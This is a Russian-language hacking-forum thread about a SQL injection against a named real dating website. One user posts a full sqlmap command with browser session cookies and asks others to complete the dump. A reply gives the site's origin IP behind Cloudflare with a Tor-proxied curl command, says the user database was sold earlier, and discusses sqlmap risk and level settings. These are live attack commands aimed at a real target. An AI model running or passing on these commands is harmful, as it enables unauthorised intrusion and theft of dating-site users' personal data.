• XSS.stack #1 – первый литературный журнал от юзеров форума

sql injection big dating

Отслеживать
serpientum

serpientum

HDD-drive
Забанен
Регистрация
06.03.2019
Сообщения
28
Реакции
8
Пожалуйста, обратите внимание, что пользователь заблокирован
не докрутил инъекцию, может у кого получится
куки все из броузера, столбцов находит 579, это же дейтинг. если у кого получится просьба поделится в ПМ

sqlmap -u "https://www.connectingsingles.com/forum_0_141018_1/the_gist_of_religion.htm" --headers="User-Agent: 1* \
75 X-Requested-With: XMLHttpRequest \
76 Connection: keep-alive \
77 Accept-Encoding: gzip,deflate \
78 Host: www.connectingsingles.com" --cookie="Cookie: __cfduid=d9c20c207debbdaca210b044c70b81e8e1581675800;_ga=GA1.2.1566040829.1581675803;_gat=1;_gid=GA1.2.842924918.1581675803;__atuvc=1%7C7;__atuvs=5e46751afafab712000;;ASP.NET_SessionId=ubsu2snnamgtckhlkwjysrnh;_kah1=KJb9AAKODNcykdPC2fJ7byQuipLVxMMvRpIjSFDFrABNwVaW7L6drvbteoGbqW5bFTTfsv4C%2bCg2ec%2f491WnWvyhmbp52gBpwmSdb4RE8%2fTUlvUNZll6M9I4dODzxbNPm90ple3bk%2b329Yt8WgVa5onewNivQz%2bz9%2foCO1c3Pxs%3d;bus6=2&bus7=1&bus21=0&bus10=3&bus8=1&bus9=1011&bus11=10674&bus13=30176&bus23=33.753316&bus24=-85.291849&bus14=2173&bus15=georgia_personals_4449345.jpg&bus16=35&bus22=0;kah3=bus6=2&bus7=1&bus21=0&bus10=3&bus8=1&bus9=1011&bus11=10674&bus13=30176&bus23=33.753316&bus24=-85.291849&bus14=2173&bus15=georgia_personals_4449345.jpg&bus16=35&bus22=0&noc1=0&noc4=2&noc3=0&noc5=2%2f14%2f2020+4%3a37%3a10+AM;kah4=tea2=abS1wiyvLPI%3d;kah5=pma1=bm%2fZcOnjb5ozdZIkUSDDfmEAYKiRpJcM&pma2=eJbXoVn%2fxo0%3d" --level=4 --dbs --no-cast --batch -o --threads=10 --union-cols=579 --union-char=1 --dbms=mysql
 
Пожалуйста, обратите внимание, что пользователь заблокирован
времени нет тамперы крутить поэтому выложил, риск ни к чему если инъекция уже найдена вроде. 10 потоков это пох в данном случае.
 
IP за клаудом 173.203.44.8, обращайтесь вместе с заголовком "Host: www.connectingsingles.com"

curl -H "Host: www.connectingsingles.com" -k https://173.203.44.8 -l --proxy socks5://127.0.0.1:9150

Тамперы там насколько помню не нужны. Базу продал еще хз когда, пару лет как точно, она к слову безпонтовая :D Наверное кто то еще до меня сливал. И багу в паблик я где то вываливал (с согласия заказчика ессно). Она по рукам ходит. Так чисто, для интереса поерутить можете =)

USEbhf крутит мап в любом случае в 1 поток, сколько ты ему не укажи. Это при сливе - да, берет max_threads из setting.py , сколько укажешь.

serpientum почитай для чего нужен риск =) Он в купе с левелом усложняет стресс тестинг и количественные вариации пэйлоадов. Смысла крутить без него нет в основном.
 
Последнее редактирование:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх